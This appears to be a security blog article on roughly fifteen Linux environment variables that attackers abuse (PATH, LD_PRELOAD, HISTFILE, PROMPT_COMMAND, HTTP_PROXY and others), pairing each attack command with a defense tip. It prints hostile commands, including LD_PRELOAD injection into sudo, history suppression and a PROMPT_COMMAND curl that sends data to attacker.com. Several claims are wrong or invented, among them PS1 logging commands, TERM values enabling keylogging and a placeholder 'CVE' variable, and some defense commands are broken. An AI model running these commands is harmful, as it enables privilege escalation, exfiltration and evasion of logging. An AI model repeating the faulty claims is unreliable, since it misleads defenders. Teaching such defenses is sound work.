Environment variables in Linux are dynamic values that influence the behavior of processes, scripts, and programs running on the system. While they are essential for system administration and development, hackers often manipulate them for privilege escalation, persistence, and stealthy operations.
In this article, we’ll explore 15+ Linux environment variables commonly used by hackers—and why you should understand them for both offensive and defensive security purposes.
—
1. What Are Linux Environment Variables?
Environment variables are key-value pairs stored in the shell session or system-wide configuration files. They can be viewed using:
printenv # Display all environment variables
echo $VARNAME # Display a specific variable
Hackers exploit these variables to:
- Modify program behavior
- Hijack library paths (LD_PRELOAD attacks)
- Maintain persistence
- Bypass security restrictions
—
2. Critical Linux Environment Variables Hackers Manipulate
Here are the most commonly abused environment variables in Linux:
1. PATH – Executable Search Path
The PATH variable defines where the shell looks for executables.
Hacker’s Trick:
- Prepend a malicious directory to execute rogue binaries instead of legitimate ones.
export PATH=/tmp/evil:$PATH # /tmp/evil/ contains malicious 'ls', 'sudo', etc.
Defense:
- Always use absolute paths for critical commands (
/usr/bin/sudo).
- Check
PATH integrity:
echo $PATH | grep -E "(\.|:)|(\.\.|::)"
—
2. LD_PRELOAD – Dynamic Library Hijacking
Forces a program to load a malicious shared library before others.
Hacker’s Trick:
- Inject a backdoor into
sudo or ssh:
gcc -shared -fPIC -o evil.so evil.c
export LD_PRELOAD=./evil.so
sudo su # Triggers the malicious library
Defense:
- Disable
LD_PRELOAD in /etc/sudoers with:
Defaults env_reset, env_keep -= "LD_PRELOAD"
—
3. LD_LIBRARY_PATH – Library Search Path
Similar to PATH, but for shared libraries.
Hacker’s Trick:
- Redirect
libc calls to a malicious library:
export LD_LIBRARY_PATH=/tmp/evil_libs
Defense:
- Use
chrpath to hardcode library paths.
- Restrict
LD_LIBRARY_PATH in secure environments.
—
4. PS1 – Custom Command Prompt
Modifies the shell prompt.
Hacker’s Trick:
- Hide malicious activity by altering the prompt:
export PS1="\u@\h:\w\$ " # Looks normal but logs commands
Defense:
- Monitor unexpected
PS1 changes in .bashrc or /etc/profile.
—
5. SHELL – Default Shell
Specifies the user’s shell.
Hacker’s Trick:
- Replace
/bin/bash with a reverse shell:
export SHELL=/tmp/evil_shell
Defense:
- Verify
SHELL in /etc/passwd and restrict modifications.
—
6. HISTFILE – Command History File
Controls where shell history is saved.
Hacker’s Trick:
- Disable logging or redirect history to
/dev/null:
export HISTFILE=/dev/null # No command history saved
Defense:
- Set immutable history file:
chattr +i ~/.bash_history
—
7. TMPDIR – Temporary Directory
Defines where temporary files are stored.
Hacker’s Trick:
- Redirect
tmp to a controlled directory:
export TMPDIR=/tmp/evil_tmp
Defense:
- Use
mktemp with explicit paths.
—
8. EDITOR / VISUAL – Default Text Editor
Used by crontab -e, sudoedit, etc.
Hacker’s Trick:
- Replace
nano with a script that adds backdoors:
export EDITOR="vim -- /tmp/backdoor.sh"
Defense:
- Hardcode safe editors in
/etc/sudoers.
—
9. SSH_ASKPASS – GUI Password Prompt
Used for SSH passphrase prompts.
Hacker’s Trick:
export SSH_ASKPASS=/tmp/password_stealer.sh
Defense:
- Disable
SSH_ASKPASS in sensitive environments.
—
10. TERM – Terminal Type
Defines terminal capabilities.
Hacker’s Trick:
- Exploit terminal escape sequences for keylogging:
export TERM=xterm-malicious
Defense:
- Use trusted
TERM values (xterm-256color).
—
11. LANG / LC_ – Locale Settings*
Affects language and encoding.
Hacker’s Trick:
- Bypass input filtering via encoding tricks:
export LANG=C # Disables UTF-8 checks
Defense:
- Enforce UTF-8 (
export LANG=en_US.UTF-8).
—
12. PROMPT_COMMAND – Pre-Command Execution
Runs before each shell prompt.
Hacker’s Trick:
export PROMPT_COMMAND="curl http://attacker.com/$(whoami)"
Defense:
- Audit
PROMPT_COMMAND in shell configs.
—
13. RUBYLIB / PYTHONPATH – Ruby/Python Module Path
Adds custom module paths.
Hacker’s Trick:
- Hijack Python/Ruby imports:
export PYTHONPATH=/tmp/malicious_modules
Defense:
- Use virtual environments (
venv).
—
14. FTP_PROXY / HTTP_PROXY – Network Proxy Settings
Redirects traffic through attacker-controlled proxies.
Hacker’s Trick:
- Man-in-the-Middle (MITM) attacks:
export HTTP_PROXY=http://attacker:8080
Defense:
- Disable proxy env vars in secure scripts.
—
15. MALICIOUS_CUSTOM_VARS – Custom Exploit Variables
Some exploits rely on custom env vars (e.g., ORACLE_HOME exploits).
Hacker’s Trick:
- Trigger 0-day exploits via obscure variables:
export CVE_2023_1234_EXPLOIT=1
Defense:
- Restrict unnecessary env vars (
env -i for minimal env).
—
3. How Hackers Use Environment Variables for Persistence
- Backdooring
.bashrc, .profile:
- Adding
export LD_PRELOAD=/backdoor.so to startup files.
- Cron Jobs with Malicious Envs:
* * * * * ENV=evil /bin/sh -c "malicious_cmd"
- Systemd Service Manipulation:
- Injecting env vars in service files (
/etc/systemd/system/).
—
4. Defensive Best Practices
✅ Restrict LD_PRELOAD and LD_LIBRARY_PATH
✅ Use env -i for minimal environments in cron jobs
✅ Audit shell startup files (~/.bashrc, /etc/profile)
✅ Monitor env vars in running processes (ps eww -p PID)
✅ Employ Mandatory Access Control (AppArmor, SELinux)
—
5. Conclusion
Linux environment variables are powerful—and dangerous in the wrong hands. By understanding how hackers abuse them, you can better secure your systems and even leverage these tricks for penetration testing.
🚀 Pro Tip:
Use strace -e trace=execve to monitor env var influence on process execution!
—
Further Reading:
🔒 Stay secure, and hack responsibly! 🔒
